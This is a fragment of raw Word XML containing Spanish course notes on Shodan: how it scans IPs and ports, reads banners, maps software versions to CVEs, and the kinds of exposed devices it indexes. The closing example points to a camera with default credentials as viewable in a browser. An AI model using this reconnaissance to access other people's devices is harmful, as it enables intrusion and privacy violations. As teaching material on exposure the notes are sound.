                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Lee banners: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D6F6C42" w14:textId="77777777" w:rsidR="00D53D3A" w:rsidRDefault="00D53D3A" w:rsidP="00D53D3A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D53D3A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>- SSH-2.0-OpenSSH_5.3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04A1DD4A" w14:textId="77777777" w:rsidR="00D53D3A" w:rsidRDefault="00D53D3A" w:rsidP="00D53D3A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista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- </w:t>
            </w:r>
            <w:r w:rsidRPr="00D53D3A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Server: Apache/2.2.15 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77000415" w14:textId="77777777" w:rsidR="00D53D3A" w:rsidRDefault="00D53D3A" w:rsidP="00D53D3A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D53D3A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>- MySQL 5.0.95</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0000EEE2" w14:textId="1A0260BE" w:rsidR="00D53D3A" w:rsidRDefault="00D53D3A" w:rsidP="00D53D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r w:rsidRPr="00D53D3A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>4. Identifica software + versión</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61F5C0B2" w14:textId="4DC1A808" w:rsidR="00D53D3A" w:rsidRDefault="00D53D3A" w:rsidP="00D53D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r w:rsidRPr="00D53D3A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>5. Busca CVEs conocidos para esas versiones</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EE72E8A" w14:textId="7E5646ED" w:rsidR="00D53D3A" w:rsidRPr="00D53D3A" w:rsidRDefault="00D53D3A" w:rsidP="00D53D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r w:rsidRPr="00D53D3A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>6. Lo indexa y hace buscable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6296BB44" w14:textId="77777777" w:rsidR="00D53D3A" w:rsidRPr="00D53D3A" w:rsidRDefault="00D53D3A" w:rsidP="00D53D3A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="38806BE2" w14:textId="1962D606" w:rsidR="00D53D3A" w:rsidRPr="00D53D3A" w:rsidRDefault="00D53D3A" w:rsidP="00D53D3A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6CE19A92" w14:textId="5F068989" w:rsidR="0043575F" w:rsidRPr="0043575F" w:rsidRDefault="0043575F" w:rsidP="00C41220">
      <w:r w:rsidRPr="0043575F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0043575F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tu resumen en una frase corregida:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Shodan escanea cada IP de Internet, detecta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">que servicios/dispositivos </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">responden en cada puerto, lee sus </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">banners </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para identificar software y versión, y asocia </w:t>
      </w:r>
      <w:r w:rsidRPr="0043575F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVEs conocidos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F78519" w14:textId="77777777" w:rsidR="009C4E8F" w:rsidRPr="00D53D3A" w:rsidRDefault="009C4E8F" w:rsidP="00C41220">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="275792AE" w14:textId="28246CEF" w:rsidR="006B7A78" w:rsidRPr="00CF52EB" w:rsidRDefault="006B7A78" w:rsidP="006B7A78">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.4.2 ¿Como funciona?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F2907B" w14:textId="6B1D5CE0" w:rsidR="006B7A78" w:rsidRPr="009C4E8F" w:rsidRDefault="006B7A78" w:rsidP="0063113E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C4E8F">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="009C4E8F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shodan escanea constantemente internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1457EC2F" w14:textId="30C5E508" w:rsidR="006B7A78" w:rsidRDefault="006B7A78" w:rsidP="006B7A78">
      <w:r w:rsidRPr="006B7A78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="006B7A78">
        <w:t>Prueba cada IP publica (m</w:t>
      </w:r>
      <w:r>
        <w:t>iles de millones)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Toca puertos comunes (</w:t>
      </w:r>
      <w:r w:rsidR="005B2DC1">
        <w:t>22, 80, 443, 3306, etc)</w:t>
      </w:r>
      <w:r w:rsidR="005B2DC1">
        <w:br/>
        <w:t>- Registra que responde</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41646943" w14:textId="719E7CC2" w:rsidR="005B2DC1" w:rsidRDefault="005B2DC1" w:rsidP="0063113E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Captura “banner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113E" w14:paraId="18FF22B1" w14:textId="77777777" w:rsidTr="0063113E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="349C64B1" w14:textId="77777777" w:rsidR="0063113E" w:rsidRPr="0063113E" w:rsidRDefault="0063113E" w:rsidP="0063113E">
            <w:r w:rsidRPr="0063113E">
              <w:t>Ejemplo: Te conectas al puerto 80 de 200.1.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ECFBC61" w14:textId="77777777" w:rsidR="0063113E" w:rsidRPr="0063113E" w:rsidRDefault="0063113E" w:rsidP="0063113E">
            <w:r w:rsidRPr="0063113E">
              <w:t xml:space="preserve">   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="327ACC86" w14:textId="77777777" w:rsidR="0063113E" w:rsidRPr="0063113E" w:rsidRDefault="0063113E" w:rsidP="0063113E">
            <w:r w:rsidRPr="0063113E">
              <w:t xml:space="preserve">   Respuesta:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C05111D" w14:textId="77777777" w:rsidR="0063113E" w:rsidRPr="0063113E" w:rsidRDefault="0063113E" w:rsidP="0063113E">
            <w:r w:rsidRPr="0063113E">
              <w:t xml:space="preserve">   HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="596E569B" w14:textId="77777777" w:rsidR="0063113E" w:rsidRPr="0063113E" w:rsidRDefault="0063113E" w:rsidP="0063113E">
            <w:r w:rsidRPr="0063113E">
              <w:t xml:space="preserve">   Server: Apache/2.2.15 (CentOS)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FDE2A07" w14:textId="78FD66AD" w:rsidR="0063113E" w:rsidRDefault="0063113E" w:rsidP="0063113E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0063113E">
              <w:t xml:space="preserve">   X-Powered-By: PHP/5.3.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72A98FDF" w14:textId="77777777" w:rsidR="005B2DC1" w:rsidRPr="005B2DC1" w:rsidRDefault="005B2DC1" w:rsidP="006B7A78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D033994" w14:textId="77777777" w:rsidR="005051C0" w:rsidRPr="005051C0" w:rsidRDefault="005051C0" w:rsidP="005051C0">
      <w:r w:rsidRPr="005051C0">
        <w:t>Shodan guarda toda esa info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302DB7A7" w14:textId="178C4E7D" w:rsidR="005051C0" w:rsidRDefault="005051C0" w:rsidP="005051C0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Indexa y categoriza</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8DD474" w14:textId="38DB30B3" w:rsidR="005051C0" w:rsidRPr="005051C0" w:rsidRDefault="00336AE4" w:rsidP="00336AE4">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00336AE4">
        <w:t xml:space="preserve">Identifica el software </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00336AE4">
        <w:t xml:space="preserve">Detecta versiones </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00336AE4">
        <w:t xml:space="preserve">Busca vulnerabilidades conocidas </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00336AE4">
        <w:t xml:space="preserve">Geolocaliza el dispositivo </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00336AE4">
        <w:t>Lo hace buscable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E208EF" w14:textId="0DEABCC5" w:rsidR="00336AE4" w:rsidRPr="00CF52EB" w:rsidRDefault="00336AE4" w:rsidP="00336AE4">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.1.4.3 ¿QUE PUEDE ENCONTRAR?</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="514F1B87" w14:textId="77777777" w:rsidR="00B636C3" w:rsidRPr="00336AE4" w:rsidRDefault="00336AE4" w:rsidP="00336AE4">
      <w:r w:rsidRPr="00336AE4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Literalmente TODO lo conectado a Internet:</w:t>
      </w:r>
      <w:r w:rsidR="00B636C3">
        <w:rPr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36C3" w14:paraId="10356404" w14:textId="77777777" w:rsidTr="00B636C3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58B4A15B" w14:textId="77777777" w:rsidR="00B636C3" w:rsidRDefault="00B636C3" w:rsidP="00336AE4">
            <w:r w:rsidRPr="00B636C3">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🖥️</w:t>
            </w:r>
            <w:r w:rsidRPr="00B636C3">
              <w:t xml:space="preserve"> SERVIDORES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="171D57AC" w14:textId="77777777" w:rsidR="00B636C3" w:rsidRDefault="00B636C3">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B636C3">
              <w:t>Web (Apache, nginx)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05A25E16" w14:textId="77777777" w:rsidR="00B636C3" w:rsidRDefault="00B636C3">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B636C3">
              <w:t>Bases de datos (MySQL, MongoDB)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3564EE95" w14:textId="77777777" w:rsidR="00864385" w:rsidRDefault="00B636C3">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B636C3">
              <w:t>SSH, FTP, Telnet</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53BC83FD" w14:textId="77777777" w:rsidR="00864385" w:rsidRDefault="00864385" w:rsidP="00864385">
            <w:r w:rsidRPr="00864385">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>📹</w:t>
            </w:r>
            <w:r w:rsidRPr="00864385">
              <w:t xml:space="preserve"> DISPOSITIVOS IoT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19B5DCEB" w14:textId="77777777" w:rsidR="00864385" w:rsidRDefault="00864385">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Camaras IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79FDDC6E" w14:textId="77777777" w:rsidR="00864385" w:rsidRDefault="00864385">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>DVR de seguridad</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="696911DC" w14:textId="77777777" w:rsidR="00864385" w:rsidRDefault="00864385">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Termostatos inteligentes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34B76C08" w14:textId="77777777" w:rsidR="00864385" w:rsidRDefault="00864385">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Refrigeradores conectados</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A4DBC15" w14:textId="77777777" w:rsidR="00864385" w:rsidRDefault="00864385">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Bombillas inteligentes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="050BCF4D" w14:textId="77777777" w:rsidR="009F53E6" w:rsidRDefault="00864385" w:rsidP="009F53E6">
            <w:r w:rsidRPr="00864385">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🏭</w:t>
            </w:r>
            <w:r w:rsidRPr="00864385">
              <w:t xml:space="preserve"> SISTEMAS INDUSTRIALES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F41C8EA" w14:textId="77777777" w:rsidR="009F53E6" w:rsidRDefault="009F53E6">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="009F53E6">
              <w:t xml:space="preserve">Controladores SCADA </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4603AF00" w14:textId="77777777" w:rsidR="009F53E6" w:rsidRDefault="009F53E6">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="009F53E6">
              <w:t>Semáforos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30758696" w14:textId="77777777" w:rsidR="009F53E6" w:rsidRDefault="009F53E6">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="009F53E6">
              <w:t>Turbinas eólicas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A6A80D7" w14:textId="77777777" w:rsidR="009F53E6" w:rsidRDefault="009F53E6">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="009F53E6">
              <w:t>Paneles solares</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="231A4625" w14:textId="77777777" w:rsidR="00864385" w:rsidRDefault="009F53E6">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="009F53E6">
              <w:t>Sistemas de energía</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29C3AFD2" w14:textId="77777777" w:rsidR="001A326E" w:rsidRDefault="001A326E" w:rsidP="001A326E">
            <w:r w:rsidRPr="001A326E">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🏥</w:t>
            </w:r>
            <w:r w:rsidRPr="001A326E">
              <w:t xml:space="preserve"> EQUIPOS MÉDICOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="435D646B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Máquinas de resonancia (MRI)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="376CD64D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Monitores cardíacos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AD2B2BC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 xml:space="preserve">Sistemas hospitalarios </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="531ABFC6" w14:textId="77777777" w:rsidR="001A326E" w:rsidRDefault="001A326E" w:rsidP="001A326E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4CDE76E3" w14:textId="77777777" w:rsidR="001A326E" w:rsidRDefault="001A326E" w:rsidP="001A326E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="14936EB7" w14:textId="77777777" w:rsidR="001A326E" w:rsidRDefault="001A326E" w:rsidP="001A326E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C6D635F" w14:textId="0D83CE71" w:rsidR="001A326E" w:rsidRDefault="001A326E" w:rsidP="001A326E">
            <w:r w:rsidRPr="001A326E">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>🎮</w:t>
            </w:r>
            <w:r w:rsidRPr="001A326E">
              <w:t xml:space="preserve"> ENTRETENIMIENTO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="396324F8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Consolas de juegos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2403B050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Smart TVs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76DE133E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Chromecasts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35FAC5D2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 xml:space="preserve">Apple TVs </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="705F2062" w14:textId="77777777" w:rsidR="001A326E" w:rsidRDefault="001A326E" w:rsidP="001A326E">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="699D87AC" w14:textId="77777777" w:rsidR="001A326E" w:rsidRDefault="001A326E" w:rsidP="001A326E">
            <w:r w:rsidRPr="001A326E">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🖨️</w:t>
            </w:r>
            <w:r w:rsidRPr="001A326E">
              <w:t xml:space="preserve"> OFICINA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7147FAC0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Impresoras</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FA490AA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Escáneres</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E9F197D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 xml:space="preserve">Fotocopiadoras </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="621DAA1A" w14:textId="77777777" w:rsidR="001A326E" w:rsidRDefault="001A326E" w:rsidP="001A326E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="61A6894B" w14:textId="77777777" w:rsidR="001A326E" w:rsidRDefault="001A326E" w:rsidP="001A326E">
            <w:r w:rsidRPr="001A326E">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🚗</w:t>
            </w:r>
            <w:r w:rsidRPr="001A326E">
              <w:t xml:space="preserve"> TRANSPORTE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09CAC66C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Sistemas de barcos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31B516E7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Controles de trenes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="287BB0CA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 xml:space="preserve">Lectores de patentes </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6553B97D" w14:textId="77777777" w:rsidR="001A326E" w:rsidRDefault="001A326E" w:rsidP="001A326E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="585E9C1B" w14:textId="77777777" w:rsidR="001A326E" w:rsidRDefault="001A326E" w:rsidP="001A326E">
            <w:r w:rsidRPr="001A326E">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>⚡</w:t>
            </w:r>
            <w:r w:rsidRPr="001A326E">
              <w:t xml:space="preserve"> INFRAESTRUCTURA CR</w:t>
            </w:r>
            <w:r w:rsidRPr="001A326E">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>Í</w:t>
            </w:r>
            <w:r w:rsidRPr="001A326E">
              <w:t>TICA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68D3DBED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Redes el</w:t>
            </w:r>
            <w:r w:rsidRPr="001A326E">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>é</w:t>
            </w:r>
            <w:r w:rsidRPr="001A326E">
              <w:t>ctricas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A97DA75" w14:textId="77777777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Sistemas de agua</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="440508F4" w14:textId="00168278" w:rsidR="001A326E" w:rsidRDefault="001A326E">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="001A326E">
              <w:t>Centrales nucleares</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="610AE60E" w14:textId="0209E97D" w:rsidR="00336AE4" w:rsidRPr="00336AE4" w:rsidRDefault="00336AE4" w:rsidP="00336AE4"/>
    <w:p w14:paraId="2F58059F" w14:textId="77777777" w:rsidR="00590FF7" w:rsidRPr="00CF52EB" w:rsidRDefault="00590FF7" w:rsidP="00590FF7">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.1.4.4 EJEMPLO REAL DE BUSQUEDA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E519A2B" w14:textId="77777777" w:rsidR="00590FF7" w:rsidRDefault="00590FF7" w:rsidP="00590FF7">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00590FF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12553B26" wp14:editId="04D36C6B">
            <wp:extent cx="4627140" cy="2522220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2013922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222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566" cy="25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90FF7">
        <w:t>¡Es una cámara con usuario/contraseña por defecto que puedes ver en tu navegador!</w:t>
      </w:r>
    </w:p>
